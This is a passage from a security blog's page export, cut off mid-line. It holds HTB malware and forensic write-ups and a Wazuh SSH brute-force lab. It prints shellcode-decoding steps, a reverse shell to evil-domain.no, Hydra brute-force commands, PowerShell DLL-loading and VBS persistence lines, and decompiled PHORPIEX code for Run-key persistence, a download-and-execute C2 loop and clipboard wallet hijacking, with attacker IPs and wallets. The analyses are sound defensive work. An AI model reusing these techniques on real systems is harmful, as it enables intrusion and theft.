49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12, 6 124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2, 7 ...[snip]... 8] 9 10sc = bytes([b \u0026amp; 0xFF for b in myArray]) 11 12with open(\u0026#34;sc.bin\u0026#34;, \u0026#34;wb\u0026#34;) as f: 13 f.write(sc) Shellcode Analysis # Decoder Stub # Loading sc.bin in IDA revealed a XOR-based decoder stub. It uses fnstenv to obtain the current instruction pointer via the FPU environment, then iterates over the payload XORing each block with a rolling key:\n1seg000:0000000000000000 ffree st(1) 2seg000:0000000000000002 mov edi, 7E425620h ; initial XOR key 3seg000:0000000000000007 fnstenv byte ptr [rsp-0Ch] 4seg000:000000000000000B pop rbx 5seg000:000000000000000C xor ecx, ecx 6seg000:000000000000000E mov cl, 62h ; loop counter = 98 7seg000:0000000000000010 xor [rbx+18h], edi ; decrypt next block 8seg000:0000000000000013 add edi, [rbx+18h] ; update key 9seg000:0000000000000016 add ebx, 24h 10seg000:0000000000000019 mov ah, 0B7h scdbg Emulation # scdbg emulation of the decoded shellcode revealed a reverse shell connecting to evil-domain.no over port 443:\n14010b6 LoadLibraryA(ws2_32) 24010c6 WSAStartup(190) 34010d5 WSASocket(af=2, tp=1, proto=0, group=0, flags=0) 4401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R}) 5401121 connect(h=42, host: 127.0.0.1, port: 443) 640113c recv(h=42, buf=12fc60, len=4, fl=0) 740117f closesocket(h=42) 8401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R}) = 1000 IOCs # Files - invoice-42369643.html — initial phishing document\n- invoice-42369643.xlsm — macro-enabled Excel workbook\n- C:\\Users\\*\\AppData\\Local\\Temp\\LwTHLrGh.hta — dropped HTA payload\n- LwTHLrGh.hta SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\nRegistry - HKCU\\Software\\Microsoft\\Office\\\u0026lt;version\u0026gt;\\Excel\\Security\\AccessVBOM set to 1\nNetwork - C2 Domain: evil-domain.no\n- C2 Port: 443/tcp\nProcesses - mshta.exe — HTA execution\n- rundll32.exe — shellcode injection target\n","date":"February 20, 2026","externalUrl":null,"permalink":"/investigations/htb-obfsc4t10n/","section":"","summary":"A phishing HTML file masquerading as an invoice delivers a macro-enabled Excel workbook that drops and executes a multi-stage obfuscated HTA payload, ultimately injecting a reverse shell shellcode into rundll32.exe and establishing a C2 connection.","title":"HTB-oBfsC4t10n","type":"investigations"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/olevba/","section":"Tags","summary":"","title":"Olevba","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/scdbg/","section":"Tags","summary":"","title":"Scdbg","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/shellcode-analysis/","section":"Tags","summary":"","title":"Shellcode Analysis","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/vmonkey/","section":"Tags","summary":"","title":"Vmonkey","type":"tags"},{"content":" Objective # Simulate an SSH brute force attack from a Kali Linux machine against an Ubuntu 22.04 agent, observe Wazuh detection capabilities, identify gaps in the default ruleset, and configure automated response.\nEnvironment # Role OS IP Attacker Kali Linux 192.168.248.129 Agent Ubuntu 22.04 Server 192.168.248.140 Wazuh Ubuntu 24.04 Server 192.168.248.50 Attack Simulation # The attack was simulated using Hydra from the Kali Linux machine targeting the Ubuntu 22.04 agent over SSH. Two brute force attempts were executed against different usernames:\n1# Attempt 1 — targeting root 2hydra -l root -P /usr/share/wordlists/fasttrack.txt ssh://192.168.248.140 3 4# Attempt 2 — targeting user \u0026#39;w\u0026#39; 5hydra -l w -P /usr/share/wordlists/fasttrack.txt ssh://192.168.248.140 Each run tried 262 passwords at ~220 attempts/min. Both attempts failed — no valid credentials were found. Total duration: ~1 min 17 sec per run.\nWhat Wazuh Detected # Wazuh generated 1,010 authentication failure alerts across both runs. 0 successful logins were recorded. Two distinct spikes are visible on the timeline (~07:08 and ~07:15), corresponding to each Hydra run. MITRE ATT\u0026amp;CK: T1110.001 - Brute Force: Password Guessing via SSH.\nSeven rule IDs were triggered during the attack:\nRule ID Level Description 5760 5 sshd: authentication failed 5551 5 sshd: Invalid user 5503 5 sshd: Connection closed 5768 5 sshd: Maximum authentication attempts exceeded 2501 5 User missed the password 2502 10 User missed the password more than once 40111 10 Multiple authentication failures Rules 5760, 5551, 5503, 5768, and 2501 fire per individual event (level 5). Rules 2502 and 40111 are correlation rules that aggregate multiple failures into a higher severity alert (level 10). Notable: 0 alerts reached level 12 or above — addressed in Tuning section.\nExpanded view of a single Rule 5760 alert:\n- Source IP: 192.168.248.129\n- Target user: w\n- Source port: 41772\n- Full log: Failed password for w from 192.168.248.129 port 41772 ssh2\n- MITRE: T1110.001 - Password Guessing / T1021.004 - SSH\n- Fired times: 533\n1{ 2 \u0026#34;agent\u0026#34;: { \u0026#34;ip\u0026#34;: \u0026#34;192.168.248.140\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;agent1\u0026#34;, \u0026#34;id\u0026#34;: \u0026#34;001\u0026#34; }, 3 \u0026#34;data\u0026#34;: { \u0026#34;srcip\u0026#34;: \u0026#34;192.168.248.129\u0026#34;, \u0026#34;dstuser\u0026#34;: \u0026#34;w\u0026#34;, \u0026#34;srcport\u0026#34;: \u0026#34;41772\u0026#34; }, 4 \u0026#34;rule\u0026#34;: { 5 \u0026#34;id\u0026#34;: \u0026#34;5760\u0026#34;, 6 \u0026#34;level\u0026#34;: 5, 7 \u0026#34;description\u0026#34;: \u0026#34;sshd: authentication failed.\u0026#34;, 8 \u0026#34;firedtimes\u0026#34;: 533, 9 \u0026#34;mitre\u0026#34;: { 10 \u0026#34;technique\u0026#34;: [\u0026#34;Password Guessing\u0026#34;, \u0026#34;SSH\u0026#34;], 11 \u0026#34;id\u0026#34;: [\u0026#34;T1110.001\u0026#34;, \u0026#34;T1021.004\u0026#34;], 12 \u0026#34;tactic\u0026#34;: [\u0026#34;Credential Access\u0026#34;, \u0026#34;Lateral Movement\u0026#34;] 13 } 14 }, 15 \u0026#34;full_log\u0026#34;: \u0026#34;Feb 20 12:15:46 w sshd[7202]: Failed password for w from 192.168.248.129 port 41772 ssh2\u0026#34;, 16 \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-20T12:15:48.177+0000\u0026#34; 17} What Was Missed \u0026amp; Why # No Level 12 or above alerts were triggered during the initial simulation. Wazuh\u0026rsquo;s built-in ruleset caps brute force detection at Level 10, meaning the attack would not trigger a critical notification by default — a potential blind spot in a real SOC environment.\nTuning \u0026amp; Custom Rules # To address the detection gap, a custom rule was created in /var/ossec/etc/rules/local_rules.xml:\n1\u0026lt;group name=\u0026#34;sshd,authentication_failed,\u0026#34;\u0026gt; 2 \u0026lt;rule id=\u0026#34;100001\u0026#34; level=\u0026#34;12\u0026#34;\u0026gt; 3 \u0026lt;if_matched_sid\u0026gt;40111\u0026lt;/if_matched_sid\u0026gt; 4 \u0026lt;description\u0026gt;SSH Brute Force: High volume of authentication failures from same source\u0026lt;/description\u0026gt; 5 \u0026lt;mitre\u0026gt; 6 \u0026lt;id\u0026gt;T1110.001\u0026lt;/id\u0026gt; 7 \u0026lt;/mitre\u0026gt; 8 \u0026lt;/rule\u0026gt; 9\u0026lt;/group\u0026gt; Response # After the custom rule 100001 triggered, Wazuh executed the built-in firewall-drop active response on agent1, automatically blocking the attacker\u0026rsquo;s IP via iptables. The active response was configured in /var/ossec/etc/ossec.conf:\n1\u0026lt;active-response\u0026gt; 2 \u0026lt;command\u0026gt;firewall-drop\u0026lt;/command\u0026gt; 3 \u0026lt;location\u0026gt;local\u0026lt;/location\u0026gt; 4 \u0026lt;rules_id\u0026gt;100001\u0026lt;/rules_id\u0026gt; 5 \u0026lt;timeout\u0026gt;180\u0026lt;/timeout\u0026gt; 6\u0026lt;/active-response\u0026gt; The effect was immediately visible in Hydra\u0026rsquo;s output — attempt rate dropped from 107 tries/min to 44 tries/min as connections began failing, and eventually all tasks were disabled:\n1[ERROR] all children were disabled due too many connection errors 2[ERROR] 1 targets did not complete Level 12 alerts: 2 — rule 100001 fired successfully.\nExpanded view of Rule 100001 alert:\n- Rule ID: 100001 (custom)\n- Level: 12\n- Source IP: 192.168.248.129\n- Target user: w\n- Fired times: 2\n- mail: true — level 12 triggers email notification if configured\n- Full log: maximum authentication attempts exceeded for w from 192.168.248.129\n- MITRE: T1110.001 - Credential Access: Password Guessing\nThe block was automatically lifted after the configured timeout of 180 seconds. To make a permanent block, the timeout value can be set to 0.\nConclusion # Wazuh successfully detected the SSH brute force attack out of the box, generating 1,010 alerts across 7 rule IDs. However, the default ruleset did not escalate the alert to critical severity (level 12), which would be a gap in a real SOC environment where level 12 triggers priority notifications.\nAdding a single custom rule resolved this gap and enabled automated IP blocking via active response — stopping the attack mid-execution without any manual intervention.\nKey takeaways:\n- Default Wazuh rules detect brute force but cap at level 10 - Custom rules can bridge the gap with minimal configuration\n- Active response provides automated containment within seconds of detection\n- Timeout-based blocks are suitable for automated response; permanent blocks require manual review to avoid blocking legitimate users\n","date":"February 20, 2026","externalUrl":null,"permalink":"/blue_team/wazuh_ssh-brute-force/","section":"","summary":"Simulated an SSH brute force attack using Hydra, observed Wazuh detection across 7 rule IDs, identified a gap in default alerting (max level 10), wrote a custom rule to escalate severity to level 12, and configured automated IP blocking via active response.","title":"Wazuh: SSH Brute Force","type":"blue_team"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/chromehistoryview/","section":"Tags","summary":"","title":"ChromeHistoryView","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/cryptneturlcache/","section":"Tags","summary":"","title":"CryptnetUrlCache","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/dll-hijacking/","section":"Tags","summary":"","title":"DLL Hijacking","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-16 TL;DR # A victim clicked a phishing link impersonating a corporate login page, leading to credential theft. The attacker used stolen credentials to gain RDP access, then escalated privileges via SeManageVolumeExploit, deployed malicious DLLs using certutil, and established persistence through a hidden VBS script in the Startup folder.\nInitial Access # Phishing URL # By analyzing the victim\u0026rsquo;s Chrome history using ChromeHistoryView, I identified that on 2025-05-23 14:20:07 the victim visited the legitimate company intranet. Two days later, on 2025-05-25 13:36:42, they clicked a phishing URL that harvested their credentials:\n1http://intranet.wowzainc.co.th/landing.php 2025-05-23 14:20:07 2https://login.wowzalnc.co.th/logon.php 2025-05-25 13:36:42 \u0026lt;- phishing 3https://mail.wowzainc.co.th/inbox.php 2025-05-23 14:21:17 The phishing domain wowzalnc.co.th impersonates the legitimate wowzainc.co.th by replacing the letter i with l.\nRDP Access # Using the harvested credentials, the attacker gained remote access via RDP on 2025-05-27 11:59:57. This was confirmed by Event ID 4624 in Security.evtx with Logon Type 10 (RemoteInteractive):\n1# Security.evtx / Event ID 4624 2Logon Type: 10 3Account Name: otello.j 4Account Domain: WORKSTATION6 5Logon ID: 0x2A017F 6Security ID: S-1-5-21-888844466-1397619329-4015378808-1001 Privilege Escalation # SeManageVolumeExploit # On 2025-05-28 12:36:59, the attacker visited freehackingtool.com and browsed its tools section:\n1http://freehackingtool.com/ 2025-05-28 12:36:59 2http://freehackingtool.com/tools/ 2025-05-28 12:37:09 3http://freehackingtool.com/tools/ 2025-05-28 12:53:36 4http://freehackingtool.com/ 2025-05-28 12:55:02 From this site, download attempts were made for three files: SeManageVolumeExploit.exe, a.vbs, and PrintConfig.dll.\nAt 2025-05-28 12:43:33, SeManageVolumeExploit.exe was successfully downloaded. This tool exploits the SeManageVolumePrivilege — a Windows privilege that allows volume-level operations such as mounting, dismounting, and defragmenting volumes. When abused, it can grant an attacker full control over the C: drive, enabling them to bypass access controls, manipulate the file system, and potentially execute arbitrary code.\nMalware Deployment # PrintConfig.dll — Malicious DLL via certutil # At 2025-05-28 12:44:01, the browser download of PrintConfig.dll was interrupted with interrupt code 41 (USER_SHUTDOWN — the browser was closed before the download completed).\nTo work around this, the attacker used the LOLBIN certutil.exe to download the file at 2025-05-28 12:45:37. This was confirmed by analyzing the CryptnetUrlCache/Metadata artifacts. The legitimate DLL at C:\\Windows\\system32\\spool\\drivers\\x64\\12\\PrintConfig.dll was then removed and replaced with the malicious version.\nAt 2025-05-28 15:19:35, Windows Defender detected and flagged the replaced DLL:\n1Name: Trojan:Win64/Meterpreter.E 2ID: 2147721833 3Severity: Severe 4Path: C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll 5 service: PrintNotify 6Detection Origin: Local machine 7User: NT AUTHORITY\\SYSTEM 8Engine Version: AM: 1.1.25050.2 tzres.dll — Secondary Malicious DLL # At 2025-05-28 12:54:23, a second malicious DLL tzres.dll was downloaded via certutil.exe and placed at C:\\Windows\\system32\\wbem\\tzres.dll.\nPrintConfig.dll Execution # From the PowerShell console history, I found that the attacker triggered execution of the malicious PrintConfig.dll by instantiating a COM object associated with the Windows spooler service:\n1dir 2$type = [Type]::GetTypeFromCLSID(\u0026#34;{854A20FB-2D44-457D-992F-EF13785D2B51}\u0026#34;) 3$object = [Activator]::CreateInstance($type) 4dir 5reg add \u0026#34;HKCU\\control panel\\desktop\u0026#34; /v wallpaper /t REG_SZ /d \u0026#34;C:/Users/Public/Pictures/gg.bmp\u0026#34; /f The CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} is associated with the PrintNotify service. Instantiating it caused spoolsv.exe to load and execute the malicious PrintConfig.dll. Additionally, the attacker downloaded an image gg.bmp and set it as the desktop wallpaper — likely to signal successful compromise.\nPersistence # a.vbs — Startup Script # At 2025-05-28 12:55:05, a.vbs was downloaded and moved to the Windows Startup folder to ensure execution on every boot:\n1C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\a.vbs The script creates a WScript.Shell object and silently runs systeminfo:\nSet WshShell = CreateObject(\u0026#34;WScript.Shell\u0026#34;) WshShell.Run \u0026#34;cmd.exe /c systeminfo\u0026#34;, 0, False systeminfo collects data via WMI, which triggers the WMI Provider Host (wmiprvse.exe). Since wmiprvse.exe executes all providers from the \\wbem\\ directory, this causes the malicious tzres.dll to be loaded automatically.\nAt 2025-05-28 12:56:11, the Hidden attribute was set on a.vbs to conceal it from the victim:\n1a.vbs 12:56:11 BasicInfoChange Hidden|Archive Attack Timeline # 12025-05-23 14:20:07 - Victim visits legitimate intranet site 22025-05-25 13:36:42 - Victim clicks phishing URL, credentials harvested 32025-05-27 11:59:57 - Attacker gains RDP access as otello.j (Logon Type 10) 42025-05-28 12:36:59 - Attacker visits freehackingtool.com 52025-05-28 12:43:33 - SeManageVolumeExploit.exe successfully downloaded 62025-05-28 12:44:01 - Browser download of PrintConfig.dll interrupted (code 41) 72025-05-28 12:45:37 - PrintConfig.dll downloaded via certutil, replaces legitimate DLL 82025-05-28 12:54:23 - tzres.dll downloaded via certutil, placed in wbem\\ 92025-05-28 12:55:05 - a.vbs downloaded and placed in Startup folder 102025-05-28 12:56:11 - Hidden attribute set on a.vbs 112025-05-28 15:19:35 - Windows Defender detects PrintConfig.dll as Trojan:Win64/Meterpreter.E IOCs # Domains\n- login.wowzalnc.co.th — phishing domain (typosquat of wowzainc.co.th)\n- freehackingtool.com — malware hosting\nFiles\n- C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll — Trojan:Win64/Meterpreter.E\n- C:\\Windows\\system32\\wbem\\tzres.dll — malicious secondary DLL\n- C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\a.vbs — persistence script\n- SeManageVolumeExploit.exe — privilege escalation tool\nRegistry\n- HKCU\\control panel\\desktop\\wallpaper — set to C:/Users/Public/Pictures/gg.bmp\nAccounts\n- otello.j — compromised via phishing\nRecommendations # Immediate Actions\nIsolate the compromised workstation from the network Block domains wowzalnc.co.th and freehackingtool.com at the perimeter Remove a.vbs from the Startup folder Restore legitimate PrintConfig.dll and tzres.dll from a clean source Reset credentials for otello.j and audit for lateral movement Review all RDP logon events (Event ID 4624, Logon Type 10) across the environment Preventive Measures\nEnable MFA on all remote access solutions to mitigate phishing-based credential theft Restrict certutil.exe usage via AppLocker or WDAC to prevent LOLBIN abuse Enable and monitor Windows Defender alerts centrally via SIEM Audit and restrict SeManageVolumePrivilege assignments Deploy DNS filtering to block known phishing and malware-hosting domains ","date":"February 16, 2026","externalUrl":null,"permalink":"/investigations/htb-workfromhome/","section":"","summary":"A victim clicked a phishing link impersonating a corporate login page, leading to credential theft. The attacker used stolen credentials to gain RDP access, then escalated privileges via SeManageVolumeExploit, deployed malicious DLLs using certutil, and established persistence through a hidden VBS script in the Startup folder.","title":"HTB-WorkFromHome","type":"investigations"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/pecmd/","section":"Tags","summary":"","title":"PECmd","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/registryexplorer/","section":"Tags","summary":"","title":"RegistryExplorer","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-08 Description:\nAfter a security incident, unusual activity on Samira’s workstation led to the discovery of a suspicious binary operating stealthily in the background. The executable evades standard detection while maintaining persistence and network communication. Your mission is to reverse the binary and extract the attacker’s TTPs for the endpoint security team.\nTL;DR # Two-stage dropper - optimize.exe downloads syscrondvr.exe (PHORPIEX) and sets persistence via Run keys. Main payload implements clipboard hijacking for crypto wallets, USB/network spreading, and UPnP NAT traversal for C2 access. Beacons to 185.156.72.39 and 45.141.233.6 every 15 minutes.\ninitial analysis # 1$ file * 2optimize.exe: PE32 executable for MS Windows 5.00 (GUI), Intel i386, 3 sections libraries # - WS2_32.dll + WININET.dll potentially used to communication with the C2 server.\n- urlmon.dll indicates file downloading capabilities, likely via URLDownloadToFile, suggesting the sample as a Downloader to retrieve and execute secondary payload.\nimports # 1socket, bind, listen, accept, connect WS2_32.dll 2send, recv, sendto, recvfrom WS2_32.dll 3WSAStartup, WSASocketA, WSASend, WSARecv WS2_32.dll 4InternetOpenA, InternetConnectA WININET.dll 5HttpOpenRequestA, HttpSendRequestA WININET.dll 6URLDownloadToFileW urlmon.dll 1RegOpenKeyExW ADVAPI32.dll 2RegSetValueExW ADVAPI32.dll 3RegQueryValueExW ADVAPI32.dll 4RegCloseKey ADVAPI32.dll - interaction with Registry, potentially for persistance or modifies system security settings\n1SetClipboardViewer USER32.dll 2ChangeClipboardChain USER32.dll 3OpenClipboard USER32.dll 4GetClipboardData USER32.dll 5SetClipboardData USER32.dll 6IsClipboardFormatAvailable USER32.dll - сlipboard hijacking capability\n1RegisterRawInputDevices USER32.dll 2GetMessageA USER32.dll - potentially keylogging via RegisterRawInputDevices\n1CreateFileW, WriteFile KERNEL32.dll 2DeleteFileW, CopyFileW, MoveFileExW KERNEL32.dll 3FindFirstFileW, FindNextFileW KERNEL32.dll 4CreateDirectoryW, RemoveDirectoryW KERNEL32.dll 5SetFileAttributesW KERNEL32.dll 6MapViewOfFile, CreateFileMappingW KERNEL32.dll - file system operation\n- SetFileAttributesW can be used for hiding files\n1CreateProcessW KERNEL32.dll 2CreateThread KERNEL32.dll 3ShellExecuteW SHELL32.dll - payload execution via CreateProcessW or ShellExecuteW\n- combined with download functions -\u0026gt; dropper/loader behavior\n1CryptAcquireContextW ADVAPI32.dll 2CryptGenRandom ADVAPI32.dll 3CryptReleaseContext ADVAPI32.dll 4rand, srand msvcrt.dll - CryptGenRandom - cryptographically secure random generation, potentially used for encryption of C2 traffic\n- rand/srand may indicate custom encryption algorithm\n1CreateMutexA KERNEL32.dll 2NtQueryVirtualMemory ntdll.dll 3Sleep, GetTickCount KERNEL32.dll - CreateMutexA - ensure single instance\n- NtQueryVirtualMemory - detect debuggers/sandboxes via memory inspection\n- Sleep + GetTickCount - potential timing-based sandbox evasion\nstrings # Hardcoded C2 Servers:\n1http://185.156.72.39/ 2http://45.141.233.6/ 3www.update.microsoft.com (likely decoy/masquerading) 4239.255.255.250 User-Agent String:\n1Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 2(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 - Recent Chrome UA (v128) for blending with legitimate traffic\n- HTTP-based C2 communication confirmed\nRegistry Run Keys:\n1Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ 2Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer Zone.Identifier Bypass:\n1%s:Zone.Identifier Dropped Files:\n1%temp%\\syscrondvr.exe 2%temp%\\tbtnds.dat 3%temp%\\tbtcmds.dat 4DriveSecManager.exe (USB) Dropper Command:\n1%s.lnk 2/c start %s \u0026amp; start %s\\DriveSecManager.exe Cryptocurrency Wallet Addresses Embedded:\n1Bitcoin: bc1q9tgkga69k094n5v0pn7ewmpp2kn66sh9hu65gq 2bitcoincash: qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r 3ronin: a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a 4Cosmos: cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr 5Terra: terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5 6Zilliqa: zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3 7... (40+ additional altcoin addresses) - i think sample monitors clipboard for crypto addresses via SetClipboardViewer chain and replaces victim\u0026rsquo;s copied address with attacker\u0026rsquo;s corresponding wallet\nrunning in Sandbox # optimize.exe\noptimize.exe acts as a dropper, it downloads a syscrondvr.exe it set a registry key in HKEY_CURRENT_USER\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run to sturtup syscrondvr.exe syscrondvr.exe syscrondvr.exe identified as a PHORPIEX by Yara and Suricata. it uses a tbtnds.dat file, likely to store a configuration data. And it makes a lot of interesting connections to 185.156.72.39:80 and some other IPs with 4500 port reversing with ida # persistence by \\Run\\ registry key # malware copies itself to %windir%, %USERPROFILE% and %temp and renames to syscrondvr.exe. Adds registry key to HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ and HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\. Changes the attribute of the file and hides it.\n1int start() 2{ 3 GetModuleFileNameW(0, \u0026amp;ExistingFileName, 0x105u);// return a filepath 4 String1 = PathFindFileNameW(\u0026amp;ExistingFileName);// return filename from filepath 5// ...[snip]... 6// 7 ExpandEnvironmentStringsW(L\u0026#34;%windir%\u0026#34;, mw_windir, 0x104u); 8 wsprintfW(NewFileName, L\u0026#34;%s\\\\%s\u0026#34;, mw_windir, L\u0026#34;syscrondvr.exe\u0026#34;); 9 if ( CopyFileW(\u0026amp;ExistingFileName, NewFileName, 0) ) 10 { 11 SetFileAttributesW(NewFileName, 3u); // hidden 12 v13 = RegOpenKeyExW( 13 HKEY_LOCAL_MACHINE, 14 L\u0026#34;Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\u0026#34;, 15 0, 16 0x20006u, 17 \u0026amp;phkResult); 18 if ( !v13 ) 19 { 20 v0 = wcslen(NewFileName); 21 if ( !RegSetValueExW(phkResult, aWindowsSetting, 0, 1u, NewFileName, 2 * v0 + 2) ) 22//...[snip]... 23 v13 = RegOpenKeyExW( 24 HKEY_CURRENT_USER, 25 L\u0026#34;Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\u0026#34;, 26 0, 27 0x20006u, 28 \u0026amp;phkResult); 29 if ( !v13 ) 30 { 31 v1 = wcslen(String); 32 if ( !RegSetValueExW(phkResult, aWindowsSetting, 0, 1u, String, 2 * v1 + 2) ) 33//...[snip]... bypass MotW # Bypasses Mark of the Web by creating a thread with :Zone.Identifier and deleting it.\n1 wsprintfW(FileName, L\u0026#34;%s:Zone.Identifier\u0026#34;, \u0026amp;ExistingFileName); 2 DeleteFileW(FileName); configure commands and C2 servers # Configure paths:\n- tbtnds.dat: \u0026ldquo;Trik Bot Nodes\u0026rdquo; — list of C2 servers - tbtcmds.dat: \u0026ldquo;Commands\u0026rdquo; — retrieve commands from C2\n1 wsprintfW(\u0026amp;word_4161D0, L\u0026#34;%s\\\\tbtnds.dat\u0026#34;, mw_userprofile); 2 wsprintfW(\u0026amp;::FileName, L\u0026#34;%s\\\\tbtcmds.dat\u0026#34;, mw_userprofile); main C2 logic # Creates a thread CreateThread(0, 0, mw_C2_main_loop, 0, 0, 0);. That thread functional as a C2 loop. It iterates through 2 hardcoded IP addresses (http://185.156.72.39/ and http://45.141.233.6/) combined with 5 distinct URI suffixes (\u0026ldquo;1\u0026rdquo; to \u0026ldquo;5\u0026rdquo;), generating a total of 10 potential endpoints per cycle (e.g., http://185.156.72.39/1).\nThe function triggers mw_download_and_execute() to retrieve (InternetOpenUrlW + InternetReadFile + WriteFile or URLDownloadToFileW) and run the executable(ShellExecute). The loop has a Sleep(0xDBBA0u) call, enforcing a 15-minute beacon interval.\n1void __stdcall __noreturn mw_C2_main_loop(PVOID Parameter) 2{ 3 memset(v5, 0, sizeof(v5)); 4 v4[0] = \u0026#34;1\u0026#34;; 5 v4[1] = \u0026#34;2\u0026#34;; 6 v4[2] = \u0026#34;3\u0026#34;; 7 v4[3] = \u0026#34;4\u0026#34;; 8 v4[4] = \u0026#34;5\u0026#34;; 9 while ( 1 ) 10 { 11 for ( i = 0; i \u0026lt; 2; ++i ) 12 { 13 Sleep(0x3E8u); 14 for ( j = 0; j \u0026lt; 5; ++j ) 15 { 16 Sleep(0x3E8u); 17 wsprintfA(szUrlName, \u0026#34;%s%s\u0026#34;, mw_http_ip[i], v4[j]); 18 DeleteUrlCacheEntry(szUrlName); 19 if ( mw_payload_checks(szUrlName, \u0026amp;v5[j]) == 1 ) 20 mw_download_and_execute(szUrlName, 0); 21 } 22 } 23 Sleep(0xDBBA0u); 24 } 25} Replace a crypt # Creates a Thread CreateThread(0, 0, mw_main_replace, 0, 0, 0);, which creates a callback function mw_WindProc_callback_.\n1v4.cbSize = 48; 2 v4.lpfnWndProc = mw_WindProc_callback_; 3 v4.hInstance = GetModuleHandleW(0); 4 v4.lpszClassName = v3; This function checks if clipboard data was updated (WM_DRAWCLIPBOARD), then uses IsClipboardFormatAvailable to check a format of clipboard data, GetClipboardData to get a descriptor of data, GlobalLock to get a pointer to clipboard data, then does some conversion of this data to the necessary format and transfers data to mw_repcale_crypt function\n1switch ( Msg ) 2 { 3 case 0x308u: // 0x308 -\u0026gt; WM_DRAWCLIPBOARD 4 uFormat = 0; 5 if ( IsClipboardFormatAvailable(0xDu) ) // unicode text 6 { 7 uFormat = 13; 8 } 9 else if ( IsClipboardFormatAvailable(1u) )// asci 10 { 11 uFormat = 1; 12 } 13 else if ( IsClipboardFormatAvailable(7u) )// CF_OEMTEXT 14 { 15 uFormat = 7; 16 } 17 if ( uFormat \u0026amp;\u0026amp; OpenClipboard(0) ) 18 { 19 hMem = GetClipboardData(uFormat); 20 mw_ptr_to_pdata = GlobalLock(hMem); 21 lpString = 0; 22 if ( uFormat == 1 ) 23 { 24 lpString = mw_convert_to_wide(mw_ptr_to_pdata, 0, 0); 25 } 26 else if ( uFormat == 7 ) 27 { 28 lpString = mw_convert1(mw_ptr_to_pdata, 0, 0); 29 } 30 else 31 { 32 lpString = mw_convert2(mw_ptr_to_pdata, 0); 33 } 34 mw_repcale_crypt(lpString); 35// ...[snip]... mw_repcale_crypt function finds if in the user\u0026rsquo;s clipboard data there is a crypto wallet, and replaces it with its own crypto wallet.\n1if ( StrStrW(lpString, L\u0026#34;bitcoincash:\u0026#34;) ) 2// ...[snip]... 3if ( *lpString == 84 ) 4 v5 = \u0026#34;TW3wpRJmZgC5WifuY468JBUCF3TEkzBT5H\u0026#34;; 5// ...[snip]... 6if ( lpString[1] == 105 \u0026amp;\u0026amp; lpString[2] == 108 ) 7 v5 = \u0026#34;zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3\u0026#34;; 8 else 9 v5 = \u0026#34;zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v\u0026#34;; 10// ...[snip]... 11mw_prt_to_replaced_pdata = GlobalLock(hMem); 12 if ( mw_prt_to_replaced_pdata ) 13 { 14 memcpy(mw_prt_to_replaced_pdata, v5, v4 + 1); 15 GlobalUnlock(hMem); 16 if ( OpenClipboard(0) ) 17 { 18 EmptyClipboard(); 19 SetClipboardData(1u, hMem); spreading via USB and network drives # creates a separate thread CreateThread(0, 0, sub_406E00, 0, 0, 0); for monitoring connected drives and automatic spreading via USB drives and network shares.\nThe function continuously checks system logical drives (mw_checks_logical_drives()), filtering USB and network devices. For each detected drive, it collects information about size and volume name, then calls sub_4068E0() for infection:\n1void __stdcall __noreturn sub_406E00(PVOID Parameter) 2{ 3 GetModuleFileNameW(0, \u0026amp;Filename, 0x104u); 4 mw_current_file_size = sub_40EA80(\u0026amp;Filename); 5 while ( 1 ) 6 { 7 v9 = mw_checks_logical_drives(); 8 for ( i = 2; i \u0026lt;= 25; ++i ) 9 { 10 v7 = sub_4064E0(v9, i, RootPathName); 11 if ( v7 == 2 || v7 == 4 ) // if USB or network drive 12 { 13 GetVolumeInformationW(RootPathName, VolumeNameBuffer, 0x105u, 0, 0, \u0026amp;FileSystemFlags, 0, 0); 14 GetDiskFreeSpaceExW(RootPathName, 0, \u0026amp;TotalNumberOfBytes, 0); 15 wsprintfW(v5, L\u0026#34; (%dGB)\u0026#34;, TotalNumberOfBytes.QuadPart / 0x40000000); 16 if ( !VolumeNameBuffer[0] ) 17 wsprintfW(VolumeNameBuffer, 